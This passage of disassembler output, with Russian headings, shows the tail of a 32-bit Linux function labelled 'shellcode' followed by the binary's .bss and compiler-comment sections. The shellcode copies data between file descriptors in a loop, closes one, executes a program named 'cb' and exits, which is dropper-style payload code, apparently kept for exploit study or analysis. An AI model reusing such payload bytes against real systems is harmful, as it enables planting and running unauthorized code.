 804a088:	89 c6                	mov    %eax,%esi
 804a08a:	31 c9                	xor    %ecx,%ecx
 804a08c:	f7 e1                	mul    %ecx
 804a08e:	99                   	cltd   
 804a08f:	66 ba e8 03          	mov    $0x3e8,%dx
 804a093:	31 db                	xor    %ebx,%ebx
 804a095:	31 c0                	xor    %eax,%eax
 804a097:	b0 03                	mov    $0x3,%al
 804a099:	89 fb                	mov    %edi,%ebx
 804a09b:	8d 8c 24 18 fc ff ff 	lea    -0x3e8(%esp),%ecx
 804a0a2:	cd 80                	int    $0x80
 804a0a4:	89 f3                	mov    %esi,%ebx
 804a0a6:	89 c2                	mov    %eax,%edx
 804a0a8:	31 c0                	xor    %eax,%eax
 804a0aa:	b0 04                	mov    $0x4,%al
 804a0ac:	cd 80                	int    $0x80
 804a0ae:	66 81 fa e8 03       	cmp    $0x3e8,%dx
 804a0b3:	74 de                	je     804a093 <shellcode+0x53>
 804a0b5:	89 f3                	mov    %esi,%ebx
 804a0b7:	31 c0                	xor    %eax,%eax
 804a0b9:	b0 06                	mov    $0x6,%al
 804a0bb:	cd 80                	int    $0x80
 804a0bd:	31 c9                	xor    %ecx,%ecx
 804a0bf:	f7 e1                	mul    %ecx
 804a0c1:	51                   	push   %ecx
 804a0c2:	66 68 63 62          	pushw  $0x6263
 804a0c6:	89 e3                	mov    %esp,%ebx
 804a0c8:	51                   	push   %ecx
 804a0c9:	53                   	push   %ebx
 804a0ca:	89 e1                	mov    %esp,%ecx
 804a0cc:	b0 0b                	mov    $0xb,%al
 804a0ce:	cd 80                	int    $0x80
 804a0d0:	31 c0                	xor    %eax,%eax
 804a0d2:	31 db                	xor    %ebx,%ebx
 804a0d4:	40                   	inc    %eax
 804a0d5:	cd 80                	int    $0x80
	...

Дизассемблирование раздела .bss:

0804a0d8 <__bss_start>:
 804a0d8:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .comment:

00000000 <.comment>:
   0:	47                   	inc    %edi
   1:	43                   	inc    %ebx
   2:	43                   	inc    %ebx
   3:	3a 20                	cmp    (%eax),%ah
   5:	28 55 62             	sub    %dl,0x62(%ebp)
   8:	75 6e                	jne    78 <_init-0x804821c>
   a:	74 75                	je     81 <_init-0x8048213>
   c:	20 34 2e             	and    %dh,(%esi,%ebp,1)
   f:	38 2e                	cmp    %ch,(%esi)
  11:	34 2d                	xor    $0x2d,%al
  13:	32 75 62             	xor    0x62(%ebp),%dh
  16:	75 6e                	jne    86 <_init-0x804820e>
  18:	74 75                	je     8f <_init-0x8048205>
  1a:	31 7e 31             	xor    %edi,0x31(%esi)
  1d:	34 2e                	xor    $0x2e,%al
  1f:	30 34 29             	xor    %dh,(%ecx,%ebp,1)
  22:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  25:	38 2e                	cmp    %ch,(%esi)
  27:	34 00                	xor    $0x0,%al
  29:	47                   	inc    %edi
  2a:	43                   	inc    %ebx
  2b:	43                   	inc    %ebx
  2c:	3a 20                	cmp    (%eax),%ah
  2e:	28 55 62             	sub    %dl,0x62(%ebp)
  31:	75 6e                	jne    a1 <_init-0x80481f3>
  33:	74 75                	je     aa <_init-0x80481ea>
  35:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  38:	38 2e                	cmp    %ch,(%esi)
  3a:	32 2d 31 39 75 62    	xor    0x62753931,%ch
  40:	75 6e                	jne    b0 <_init-0x80481e4>
  42:	74 75                	je     b9 <_init-0x80481db>
  44:	31 29                	xor    %ebp,(%ecx)
  46:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  49:	38 2e                	cmp    %ch,(%esi)
  4b:	32 00                	xor    (%eax),%al
